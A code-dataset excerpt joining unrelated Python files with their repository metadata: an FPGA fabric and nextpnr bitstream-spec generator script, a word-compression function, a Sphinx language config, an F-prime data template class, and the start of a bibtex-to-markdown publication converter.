pairStr += tileLoc + ".A," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".B," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".C," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".D," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S0," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S1," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for outPip in tile.pipMuxes_MapSourceToSinks["M_AH"]:
pairStr += tileLoc + ".A," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".B," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".C," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".D," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".E," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".F," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".G," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".H," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S0," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S1," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S2," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S3," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for outPip in tile.pipMuxes_MapSourceToSinks["M_EF"]:
pairStr += tileLoc + ".E," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".F," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S0," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S2," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
elif bel == "MULADD":
for i in range(20):
for outPip in tile.pipMuxes_MapSourceToSinks[f"Q{i}"]:
for i in range(8):
pairStr += tileLoc + f".A[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for i in range(8):
pairStr += tileLoc + f".B[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for i in range(20):
pairStr += tileLoc + f".C[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
elif bel == "RegFile_32x4":
for i in range(4):
for outPip in tile.pipMuxes_MapSourceToSinks[f"AD{i}"]:
pairStr += tileLoc + ".W_en," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for j in range(4):
pairStr += tileLoc + f".D[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + f".W_ADR[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + f".A_ADR[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for outPip in tile.pipMuxes_MapSourceToSinks[f"BD{i}"]:
pairStr += tileLoc + ".W_en," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for j in range(4):
pairStr += tileLoc + f".D[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + f".W_ADR[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + f".B_ADR[{j}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
elif bel == "IO_1_bidirectional_frame_config_pass":
#inPorts go into the fabric, outPorts go out
for inPort in ("O", "Q"):
for outPip in tile.pipMuxes_MapSourceToSinks[prefix + inPort]:
pairStr += tileLoc + "." + prefix + inPort + "," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
#Outputs are covered by the wire code, as pips will link to them
elif bel == "InPass4_frame_config":
for i in range(4):
for outPip in tile.pipMuxes_MapSourceToSinks[prefix + "O" + str(i)]:
pairStr += tileLoc + "." + prefix + f"O{i}" + "," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
elif bel == "OutPass4_frame_config":
for i in range(4):
for inPip in tile.pipMuxes_MapSinkToSources[prefix + "I" + str(i)]:
pairStr += tileLoc + "." + addBrackets(inPip, tile) + "," + tileLoc + "." + prefix + f"I{i}" + "\n"
templateStr += "endmodule"
if generatePairs:
return (pipsStr, belsStr, templateStr, constraintStr, pairStr)
else:
return (pipsStr, belsStr, templateStr, constraintStr)
def genBitstreamSpec(archObject: Fabric):
specData = {"TileMap":{}, "TileSpecs":{}, "FrameMap":{}, "ArchSpecs":{"MaxFramesPerCol":MaxFramesPerCol, "FrameBitsPerRow":FrameBitsPerRow}}
BelMap = {}
for line in archObject.tiles:
for tile in line:
specData["TileMap"][tile.genTileLoc()] = tile.tileType
#Generate mapping dicts for bel types:
#The format here is that each BEL has a dictionary that maps a fasm feature to another dictionary that maps bits to their values
#The lines generating the BEL maps do it slightly differently, just notating bits that should go high - this is translated further down
#We do not worry about bitmasking here - that's handled in the generation
#LUT4:
LUTmap = {}
LUTmap["INIT"] = 0 #Futureproofing as there are two ways that INIT[0] may be referred to (FASM parser will use INIT to refer to INIT[0])
for i in range(16):
LUTmap["INIT[" + str(i) + "]"] = i
LUTmap["FF"] = 16
LUTmap["IOmux"] = 17
BelMap["LUT4c_frame_config"] = LUTmap
#MUX8
MUX8map = {"c0":0, "c1":1}
BelMap["MUX8LUT_frame_config"] = MUX8map
#MULADD
MULADDmap = {}
MULADDmap["A_reg"] = 0
MULADDmap["B_reg"] = 1
MULADDmap["C_reg"] = 2
MULADDmap["ACC"] = 3
MULADDmap["signExtension"] = 4
MULADDmap["ACCout"] = 5
BelMap["MULADD"] = MULADDmap
#InPass
InPassmap = {}
InPassmap["I0_reg"] = 0
InPassmap["I1_reg"] = 1
InPassmap["I2_reg"] = 2
InPassmap["I3_reg"] = 3
BelMap["InPass4_frame_config"] = InPassmap
#OutPass
OutPassmap = {}
OutPassmap["I0_reg"] = 0
OutPassmap["I1_reg"] = 1
OutPassmap["I2_reg"] = 2
OutPassmap["I3_reg"] = 3
BelMap["OutPass4_frame_config"] = OutPassmap
#RegFile
RegFilemap = {}
RegFilemap["AD_reg"] = 0
RegFilemap["BD_reg"] = 1
BelMap["RegFile_32x4"] = RegFilemap
BelMap["IO_1_bidirectional_frame_config_pass"] = {}
###NOTE: THIS METHOD HAS BEEN CHANGED FROM A PREVIOUS IMPLEMENTATION SO PLEASE BEAR THIS IN MIND
#To account for cascading and termination, this now creates a separate map for every tile, as opposed to every cellType
for row in archObject.tiles:
#curTile = getTileByType(archObject, cellType)
for curTile in row:
cellType = curTile.tileType
if cellType == "NULL":
continue
#Generate frame masks from ConfigMem
try:
configCSV = open(cellType + "_ConfigMem.csv") #This may need to be .init.csv, not just .csv
except:
print(f"No Config Mem csv file found for {cellType}. Assuming no config memory.")
#specData["FrameMap"][cellType] = {}
continue
configList = [i.strip('\n').split(',') for i in configCSV]
configList = RemoveComments(configList)
maskDict = {}
encodeDict = [-1 for i in range(FrameBitsPerRow*MaxFramesPerCol)] #Bitmap with the specific configmem.csv file
for line in configList:
configEncode = []
maskDict[int(line[1])] = line[3].replace("_", "")
for index in line[4:]:
if ':' in index:
index_temp = index.split(':')
index_width = int(index_temp[0])-int(index_temp[1])+1
for i in range(index_width):
configEncode.append(str(int(index_temp[0])-i))
else:
configEncode.append(index)
encode_i = 0
for i,char in enumerate(maskDict[int(line[1])]):
if char != '0':
encodeDict[int(configEncode[encode_i])] = (31 - i) + ( 32 * int(line[1]))
encode_i += 1
#specData["FrameMap"][cellType] = maskDict
# if specData["ArchSpecs"]["MaxFramesPerCol"] < int(line[1]) + 1:
# specData["ArchSpecs"]["MaxFramesPerCol"] = int(line[1]) + 1
# if specData["ArchSpecs"]["FrameBitsPerRow"] < int(line[2]):
# specData["ArchSpecs"]["FrameBitsPerRow"] = int(line[2])
configCSV.close()
curBitOffset = 0
curTileMap = {}
for i, belPair in enumerate(curTile.bels): #Add the bel features we made a list of earlier
tempOffset = 0
name = letters[i]
belType = belPair[0]
for featureKey in BelMap[belType]:
curTileMap[name + "." +featureKey] = {encodeDict[BelMap[belType][featureKey] + curBitOffset]: "1"} #We convert to the desired format like so
if featureKey != "INIT":
tempOffset += 1
curBitOffset += tempOffset
csvFile = [i.strip('\n').split(',') for i in open(curTile.matrixFileName)]
pipCounts = [int(row[-1]) for row in csvFile[1::]]
csvFile = RemoveComments(csvFile)
sinks = [line[0] for line in csvFile]
sources = csvFile[0]
pips = []
pipsdict = {}
for y, row in enumerate(csvFile[1::]): #Config bits for switch matrix from file
muxList = []
pipCount = pipCounts[y]
for x, value in enumerate(row[1::]):
#Remember that x and y are offset
if value == "1":
muxList.append(".".join((sources[x+1], sinks[y+1])))
muxList.reverse() #Order is flipped
for i, pip in enumerate(muxList):
controlWidth = int(numpy.ceil(numpy.log2(pipCount)))
if pipCount < 2:
curTileMap[pip] = {}
continue
pip_index = pipCount-i-1
controlValue = f"{pip_index:0{controlWidth}b}"
tempOffset = 0
for curChar in controlValue[::-1]:
if pip not in curTileMap.keys():
curTileMap[pip] = {}
curTileMap[pip][encodeDict[curBitOffset + tempOffset]] = curChar
tempOffset += 1
curBitOffset += controlWidth
for wire in curTile.wires: #And now we add empty config bit mappings for immutable connections (i.e. wires), as nextpnr sees these the same as normal pips
for count in range(int(wire["wire-count"])):
wireName = ".".join((wire["source"] + str(count), wire["destination"] + str(count)))
curTileMap[wireName] = {} #Tile connection wires are seen as pips by nextpnr for ease of use, so this makes sure those pips still have corresponding keys
for wire in curTile.atomicWires:
wireName = ".".join((wire["source"], wire["destination"]))
curTileMap[wireName] = {}
specData["TileSpecs"][curTile.genTileLoc()] = curTileMap
return specData
#####################################################################################
# Main
#####################################################################################
# read fabric description as a csv file (Excel uses tabs '\t' instead of ',')
print('### Read Fabric csv file ###')
FabricFile = [i.strip('\n').split(',') for i in open('fabric.csv')]
fabric = GetFabric(FabricFile) #filter = 'Fabric' is default to get the definition between 'FabricBegin' and 'FabricEnd'
# the next isn't very elegant, but it works...
# I wanted to store parameters in our fabric csv between a block 'ParametersBegin' and ParametersEnd'
ParametersFromFile = GetFabric(FabricFile, filter = 'Parameters')
for item in ParametersFromFile:
# if the first element is the variable name, then overwrite the variable state with the second element, otherwise it would leave the default
if 'ConfigBitMode' == item[0]:
ConfigBitMode = item[1]
elif 'FrameBitsPerRow' == item[0]:
FrameBitsPerRow = int(item[1])
elif 'Package' == item[0]:
Package = int(item[1])
elif 'MaxFramesPerCol' == item[0]:
MaxFramesPerCol = int(item[1])
elif 'GenerateDelayInSwitchMatrix' == item[0]:
GenerateDelayInSwitchMatrix = int(item[1])
elif 'MultiplexerStyle' == item[0]:
MultiplexerStyle = item[1]
else:
raise ValueError('\nError: unknown parameter "'+item[0]+'" in fabric csv at section ParametersBegin\n')
### # from StackOverflow config.get("set", "var_name")
### #ConfigBitMode frame_based
### # config.get("frame_based", "ConfigBitMode")
### config = ConfigParser.ConfigParser()
### config.read("fabric.ini")
### var_a = config.get("myvars", "var_a")
### var_b = config.get("myvars", "var_b")
### var_c = config.get("myvars", "var_c")
print('DEBUG Parameters: ', ConfigBitMode, FrameBitsPerRow)
TileTypes = GetCellTypes(fabric)
# The original plan was to do something super generic where tiles can be arbitrarily defined.
# However, that would have let into a heterogeneous/flat FPGA fabric as each tile may have different sets of wires to route.
# If we say that a wire is defined by/in its source cell then that implies how many wires get routed through adjacent neighbouring tiles.
# To keep things simple, we left this all out and the wiring between tiles is the same (for the first shot)
print('### Script command arguments are:\n' , str(sys.argv))
if ('-GenTileSwitchMatrixCSV'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate initial switch matrix template (has to be bootstrapped first)')
for tile in TileTypes:
print('### generate csv for tile ', tile, ' # filename:', (str(tile)+'_switch_matrix.csv'))
TileFileHandler = open(str(tile)+'_switch_matrix.csv','w')
TileInformation = GetTileFromFile(FabricFile,str(tile))
BootstrapSwitchMatrix(TileInformation,str(tile),(str(tile)+'_switch_matrix.csv'))
TileFileHandler.close()
if ('-GenTileSwitchMatrixVHDL'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate initial switch matrix VHDL code')
for tile in TileTypes:
print('### generate VHDL for tile ', tile, ' # filename:', (str(tile)+'_switch_matrix.vhdl'))
TileFileHandler = open(str(tile)+'_switch_matrix.vhdl','w+')
GenTileSwitchMatrixVHDL(tile,(str(tile)+'_switch_matrix.csv'),TileFileHandler)
TileFileHandler.close()
if ('-GenTileSwitchMatrixVerilog'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate initial switch matrix Verilog code')
for tile in TileTypes:
print('### generate Verilog for tile ', tile, ' # filename:', (str(tile)+'_switch_matrix.v'))
TileFileHandler = open(str(tile)+'_switch_matrix.v','w+')
GenTileSwitchMatrixVerilog(tile,(str(tile)+'_switch_matrix.csv'),TileFileHandler)
TileFileHandler.close()
if ('-GenTileConfigMemVHDL'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate all tile HDL descriptions')
for tile in TileTypes:
print('### generate configuration bitstream storage VHDL for tile ', tile, ' # filename:', (str(tile)+'_ConfigMem.vhdl'))
# TileDescription = GetTileFromFile(FabricFile,str(tile))
# TileVHDL_list = GenerateTileVHDL_list(FabricFile,str(tile))
# I tried various "from StringIO import StringIO" all not working - gave up
TileFileHandler = open(str(tile)+'_ConfigMem.vhdl','w+')
TileInformation = GetTileFromFile(FabricFile,str(tile))
GenerateConfigMemVHDL(TileInformation,str(tile)+'_ConfigMem',TileFileHandler)
TileFileHandler.close()
if ('-GenTileConfigMemVerilog'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
#print('### Generate all tile HDL descriptions')
for tile in TileTypes:
print('### generate configuration bitstream storage Verilog for tile ', tile, ' # filename:', (str(tile)+'_ConfigMem.v'))
# TileDescription = GetTileFromFile(FabricFile,str(tile))
# TileVHDL_list = GenerateTileVHDL_list(FabricFile,str(tile))
# I tried various "from StringIO import StringIO" all not working - gave up
TileFileHandler = open(str(tile)+'_ConfigMem.v','w+')
TileInformation = GetTileFromFile(FabricFile,str(tile))
GenerateConfigMemVerilog(TileInformation,str(tile)+'_ConfigMem',TileFileHandler)
TileFileHandler.close()
if ('-GenTileHDL'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate all tile HDL descriptions')
for tile in TileTypes:
print('### generate VHDL for tile ', tile, ' # filename:', (str(tile)+'_tile.vhdl'))
# TileDescription = GetTileFromFile(FabricFile,str(tile))
# TileVHDL_list = GenerateTileVHDL_list(FabricFile,str(tile))
# I tried various "from StringIO import StringIO" all not working - gave up
TileFileHandler = open(str(tile)+'_tile.vhdl','w+')
TileInformation = GetTileFromFile(FabricFile,str(tile))
GenerateTileVHDL(TileInformation,str(tile),TileFileHandler)
TileFileHandler.close()
if ('-GenTileVerilog'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
#print('### Generate all tile Verilog descriptions')
for tile in TileTypes:
print('### generate Verilog for tile ', tile, ' # filename:', (str(tile)+'_tile.v'))
# TileDescription = GetTileFromFile(FabricFile,str(tile))
# TileVHDL_list = GenerateTileVHDL_list(FabricFile,str(tile))
# I tried various "from StringIO import StringIO" all not working - gave up
TileFileHandler = open(str(tile)+'_tile.v','w+')
TileInformation = GetTileFromFile(FabricFile,str(tile))
GenerateTileVerilog(TileInformation,str(tile),TileFileHandler)
TileFileHandler.close()
if ('-GenFabricHDL'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate the Fabric VHDL descriptions')
FileHandler = open('fabric.vhdl','w+')
GenerateFabricVHDL(FabricFile,FileHandler)
FileHandler.close()
if ('-GenFabricVerilog'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate the Fabric Verilog descriptions')
FileHandler = open('fabric.v','w+')
fabric_top = GenerateFabricVerilog(FabricFile,FileHandler)
FileHandler.close()
#w = open('eFPGA_top.v', "w+")
#w.write(fabric_top)
#w.close()
if ('-CSV2list'.lower() in str(sys.argv).lower()) or ('-AddList2CSV'.lower() in str(sys.argv).lower()):
arguments = re.split(' ',str(sys.argv))
# index was not working...
i = 0
for item in arguments:
# print('debug',item)
if re.search('-CSV2list', arguments[i], flags=re.IGNORECASE) or re.search('-AddList2CSV', arguments[i], flags=re.IGNORECASE):
break
i += 1
if arguments[i+2] == '':
raise ValueError('\nError: -CSV2list and -AddList2CSV expect two file names\n')
# stupid python adds quotes ' ' around the file name and a ',' -- bizarre
substitutions = {",": "", "\'": "", "\]": "", "\[": ""}
# InFileName = (replace(arguments[i+1], substitutions))
# don't ask me why I have to delete the stupid '['...; but at least works now
InFileName = re.sub('\]','',re.sub('\'','',(replace(arguments[i+1], substitutions))))
OutFileName = re.sub('\]','',re.sub('\'','',(replace(arguments[i+2], substitutions))))
if ('-CSV2list'.lower() in str(sys.argv).lower()):
CSV2list(InFileName, OutFileName)
if ('-AddList2CSV'.lower() in str(sys.argv).lower()):
list2CSV(InFileName, OutFileName)
if ('-PrintCSV_FileInfo'.lower() in str(sys.argv).lower()) :
arguments = re.split(' ',str(sys.argv))
# index was not working...
i = 0
for item in arguments:
# print('debug',item)
if re.search('-PrintCSV_FileInfo', arguments[i], flags=re.IGNORECASE):
break
i += 1
if arguments[i+1] == '':
raise ValueError('\nError: -PrintCSV_FileInfo expect a file name\n')
# stupid python adds quotes ' ' around the file name and a ',' -- bizarre
substitutions = {",": "", "\'": "", "\]": "", "\[": ""}
# InFileName = (replace(arguments[i+1], substitutions))
# don't ask me why I have to delete the stupid '['...; but at least works now
InFileName = re.sub('\]','',re.sub('\'','',(replace(arguments[i+1], substitutions))))
if ('-PrintCSV_FileInfo'.lower() in str(sys.argv).lower()):
PrintCSV_FileInfo(InFileName)
if ('-GenNextpnrModel'.lower() in str(sys.argv).lower()) :
arguments = re.split(' ',str(sys.argv))
fabricObject = genFabricObject(fabric)
pipFile = open("npnroutput/pips.txt","w")
belFile = open("npnroutput/bel.txt", "w")
#pairFile = open("npnroutput/wirePairs.csv", "w")
templateFile = open("npnroutput/template.v", "w")
constraintFile = open("npnroutput/template.pcf", "w")
npnrModel = genNextpnrModel(fabricObject, False)
pipFile.write(npnrModel[0])
belFile.write(npnrModel[1])
templateFile.write(npnrModel[2])
constraintFile.write(npnrModel[3])
#pairFile.write(npnrModel[4])
pipFile.close()
belFile.close()
templateFile.close()
constraintFile.close()
#pairFile.close()
if ('-GenNextpnrModel_pair'.lower() in str(sys.argv).lower()) :
arguments = re.split(' ',str(sys.argv))
fabricObject = genFabricObject(fabric)
pipFile = open("npnroutput/pips.txt","w")
belFile = open("npnroutput/bel.txt", "w")
pairFile = open("npnroutput/wirePairs.csv", "w")
templateFile = open("npnroutput/template.v", "w")
constraintFile = open("npnroutput/template.pcf", "w")
npnrModel = genNextpnrModel(fabricObject)
pipFile.write(npnrModel[0])
belFile.write(npnrModel[1])
templateFile.write(npnrModel[2])
constraintFile.write(npnrModel[3])
pairFile.write(npnrModel[4])
pipFile.close()
belFile.close()
templateFile.close()
constraintFile.close()
pairFile.close()
if ('-GenBitstreamSpec'.lower() in str(sys.argv).lower()) :
arguments = re.split(' ',str(sys.argv))
# index was not working...
i = 0
for item in arguments:
# print('debug',item)
if re.search('-genBitstreamSpec', arguments[i], flags=re.IGNORECASE):
break
i += 1
if arguments[i+1] == '':
raise ValueError('\nError: -genBitstreamSpec expect an output file name\n')
substitutions = {",": "", "\'": "", "\]": "", "\[": ""}
OutFileName = re.sub('\]','',re.sub('\'','',(replace(arguments[i+1], substitutions))))
print(arguments)
fabricObject = genFabricObject(fabric)
bitstreamSpecFile = open(OutFileName, "wb")
specObject = genBitstreamSpec(fabricObject)
pickle.dump(specObject, bitstreamSpecFile)
bitstreamSpecFile.close()
w = csv.writer(open(OutFileName.replace("txt","csv"), "w"))
for key1 in specObject["TileSpecs"]:
w.writerow([key1])
for key2, val in specObject["TileSpecs"][key1].items():
w.writerow([key2,val])
if ('-help'.lower() in str(sys.argv).lower()) or ('-h' in str(sys.argv).lower()):
print('')
print('Options/Switches')
print(' -GenTileSwitchMatrixCSV - generate initial switch matrix template (has to be bootstrapped first)')
print(' -GenTileSwitchMatrixVHDL - generate initial switch matrix VHDL code')
print(' -GenTileHDL - generate all tile VHDL descriptions')
print(' -run_all - run the 3 previous steps in one go (more for debug)')
print(' -CSV2list in.csv out.list - translate a switch matrix adjacency matrix into a list (beg_port,end_port)')
print(' -AddList2CSV in.list out.csv - adds connctions from a list (beg_port,end_port) to a switch matrix adjacency matrix')
print(' -PrintCSV_FileInfo foo.csv - prints input and oputput ports in csv switch matrix files')
print(' -genNextpnrModel - generates a model for nextpnr in the npnroutput directory')
print(' -genNextpnrModel_pair - generates a model for nextpnr in the npnroutput directory and wirePairs')
print(' -genBitstreamSpec meta_data.txt - generates a bitstream spec for fasm parsing ')
print(' -genBitstream template.fasm meta_data.txt bitstream.txt - generates a bitstream - the first file is the fasm file, the second is the bitstream spec and the third is the fasm file to write to')
print('')
print('Steps to use this script to produce an FPGA fabric:')
print(' 1) create/modify a fabric description (see fabric.csv as an example)')
print(' 2) create BEL primitives as VHDL code. ')
print(' Use std_logic (not std_logic_vector) ports')
print(' Follow the example in clb_slice_4xLUT4.vhdl')
print(' Only one entity allowed in the file!')
print(' If you use further components, they go into extra files.')
print(' The file name and the entity should match.')
print(' Ensure the top-level BEL VHDL-file is in your fabric description.')
print(' 3) run the script with the -GenTileSwitchMatrixCSV switch ')
print(' This will eventually overwrite all old switch matrix csv-files!!!')
print(' 4) Edit the switch matrix adjacency (the switch matrix csv-files).')
print(' 5) run the script with the -GenTileSwitchMatrixVHDL switch ')
print(' This will generate switch matrix VHDL files')
print(' 6) run the script with the -GenTileHDL switch ')
print(' This will generate all tile VHDL files')
print(' Note that the only manual VHDL code is implemented in 2) the rest is autogenerated!')
CLB = GetTileFromFile(FabricFile,'CLB')
# Inputs, Outputs = GetComponentPortsFromFile('clb_slice_4xLUT4.vhdl')
# print('GetComponentPortsFromFile Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPorts(CLB, 'SwitchMatrix')
# print('GetTileComponentPorts SwitchMatrix Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPorts(CLB, 'SwitchMatrixIndexed')
# print('GetTileComponentPorts SwitchMatrixIndexed Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPorts(CLB, 'all')
# print('GetTileComponentPorts all Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPorts(CLB, 'allIndexed')
# print('GetTileComponentPorts all Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# print('####################################################################################')
# Inputs, Outputs = GetTileComponentPortsVectors(CLB, 'SwitchMatrix')
# print('GetTileComponentPorts SwitchMatrix Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPortsVectors(CLB, 'SwitchMatrixIndexed')
# print('GetTileComponentPorts SwitchMatrixIndexed Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPortsVectors(CLB, 'all')
# print('GetTileComponentPorts all Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPortsVectors(CLB, 'allIndexed')
# print('GetTileComponentPorts all Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# for i in range(1,10):
# print('test',i,' log ',int(math.ceil(math.log2(i))))
# print('CLB tile: \n')
# for item in CLB:
# print(item,'\n')
# CellTypes = GetCellTypes(fabric)
# print('myout: ',CellTypes)
# print('x_tiles ',x_tiles,' y_tiles ',y_tiles)
# print('fabric: \n')
# for item in fabric:
# print(item,'\n')
| 57.851236 | 325 | 0.580427 |
4a1f4a354a2c9e1022c4e8d15291c537fd1e1e6d | 741 | py | Python | Company-Based/roblox/word_compression.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 3 | 2017-02-15T20:55:04.000Z | 2018-09-26T18:48:24.000Z | Company-Based/roblox/word_compression.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 4 | 2017-10-07T18:59:20.000Z | 2019-10-08T05:43:25.000Z | Company-Based/roblox/word_compression.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 1 | 2017-10-08T06:52:21.000Z | 2017-10-08T06:52:21.000Z | def compressWord(word: str, k: int):
# Lets define a stack to maintain stream of letters.
from collections import deque
stck = deque([])
for c in word:
if stck:
old_c, val = stck[-1]
if old_c == c:
stck.append((c, val+1))
else:
stck.append((c, 1))
else:
stck.append((c, 1))
# Now we check if top element has been repeated k times and remove it.
old_c, val = stck[-1]
if val == k:
# Remove k elements
for i in range(k):
stck.pop()
cArray = [c for c, v in stck]
return ''.join(cArray)
# print(compressWord("abbcccb", 3))
print(compressWord("aba", 2)) | 28.5 | 79 | 0.503374 |
4a1f4ad85d8a7552854d8f3d4e6153edac9f280c | 230 | py | Python | docs/en/doclanguage.py | babab/DisPass | 9563ddeef60fc580ce13fa3bfdedea56225ea099 | [
"0BSD"
] | 3 | 2015-02-03T05:49:40.000Z | 2016-06-24T01:44:38.000Z | sphinx-doc/en/doclanguage.py | ryuslash/DisPass | d19962377457b4106355fa236d2cc8e0b039ad9f | [
"0BSD"
] | 56 | 2016-01-25T17:44:15.000Z | 2018-11-02T18:05:51.000Z | sphinx-doc/en/doclanguage.py | ryuslash/DisPass | d19962377457b4106355fa236d2cc8e0b039ad9f | [
"0BSD"
] | 1 | 2016-01-25T17:58:53.000Z | 2016-01-25T17:58:53.000Z | import sys
import os
# Import from dispass for versionStr
sys.path.insert(0, os.path.abspath('../../'))
from dispass import dispass
# language specific settings
language = 'en'
html_title = dispass.versionStr + ' documentation'
| 20.909091 | 50 | 0.747826 |
4a1f4b1b147fbc2000308981fa1cc1cc5b58f87b | 759 | py | Python | Gds/src/fprime_gds/common/templates/data_template.py | chrisdonlan/fprime | 0cab90e238cff1b50c20f1e148a44cf8827a5bf8 | [
"Apache-2.0"
] | 5 | 2019-10-22T03:41:02.000Z | 2022-01-16T12:48:31.000Z | Gds/src/fprime_gds/common/templates/data_template.py | chrisdonlan/fprime | 0cab90e238cff1b50c20f1e148a44cf8827a5bf8 | [
"Apache-2.0"
] | 27 | 2019-02-07T17:58:58.000Z | 2019-08-13T00:46:24.000Z | Gds/src/fprime_gds/common/templates/data_template.py | chrisdonlan/fprime | 0cab90e238cff1b50c20f1e148a44cf8827a5bf8 | [
"Apache-2.0"
] | 3 | 2019-01-01T18:44:37.000Z | 2019-08-01T01:19:39.000Z | '''
@brief Base data template class.
Data templates are classes whose instances describe a specific class of data
items. For example, a data template instance could describe the AF_ASSERT_0
event or the channel FR_CycleTime.
@date Created July 2, 2018
@author R. Joseph Paetz
@bug No known bugs
'''
class DataTemplate(object):
'''Base class for all data template classes'''
def __init__(self):
'''
Constructor.
The only required fields for template classes are id and name
Returns:
Initialized Template object
'''
# Initialize at least id and name here
pass
def get_id(self):
raise NotImplementedError
def get_name(self):
raise NotImplementedError
| 21.083333 | 76 | 0.673254 |
4a1f4b8dc8d39737a2eda189d554f89df95b8697 | 6,413 | py | Python | markdown_generator/pubsFromBib.py | ThomasDeb/ThomasDeb.github.io | 646689b0dd92244999c5acea1bb0d7faead97b52 | [
"MIT"
] | null | null | null | markdown_generator/pubsFromBib.py | ThomasDeb/ThomasDeb.github.io | 646689b0dd92244999c5acea1bb0d7faead97b52 | [
"MIT"
] | null | null | null | markdown_generator/pubsFromBib.py | ThomasDeb/ThomasDeb.github.io | 646689b0dd92244999c5acea1bb0d7faead97b52 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# # Publications markdown generator for academicpages
#
# Takes a set of bibtex of publications and converts them for use with [academicpages.github.io](academicpages.github.io). This is an interactive Jupyter notebook ([see more info here](http://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html)).
#
# The core python code is also in `pubsFromBibs.py`.
# Run either from the `markdown_generator` folder after replacing updating the publist dictionary with:
# * bib file names
# * specific venue keys based on your bib file preferences
# * any specific pre-text for specific files
# * Collection Name (future feature)
#
# TODO: Make this work with other databases of citations,
# TODO: Merge this with the existing TSV parsing solution
from pybtex.database.input import bibtex
import pybtex.database.input.bibtex
from time import strptime
import string
import html
import os
import re
#todo: incorporate different collection types rather than a catch all publications, requires other changes to template
publist = {
"preprints": {
"file": "preprints.bib",
"venuekey": "journal",
"venue-pretext": "",
"collection": {"name": "publications",
"permalink": "/publications/"}
},
"proceedings": {
"file" : "proceedings.bib",
"venuekey": "booktitle",
"venue-pretext": "",
"collection" : {"name":"publications",
"permalink":"/publications/"}
},
"journal":{
"file": "journal.bib",
"venuekey" : "journal",
"venue-pretext" : "",
"collection" : {"name":"publications",
"permalink":"/publications/"}
}
}
html_escape_table = {
"&": "&",
'"': """,
"'": "'"
}
def html_escape(text):
"""Produce entities within text."""
s = "".join(html_escape_table.get(c, c) for c in text)
s = s.replace("&amp;", "&")
s = s.replace("&quot;", """)
s = s.replace("&apos;", "'")
return s
for pubsource in publist:
parser = bibtex.Parser()
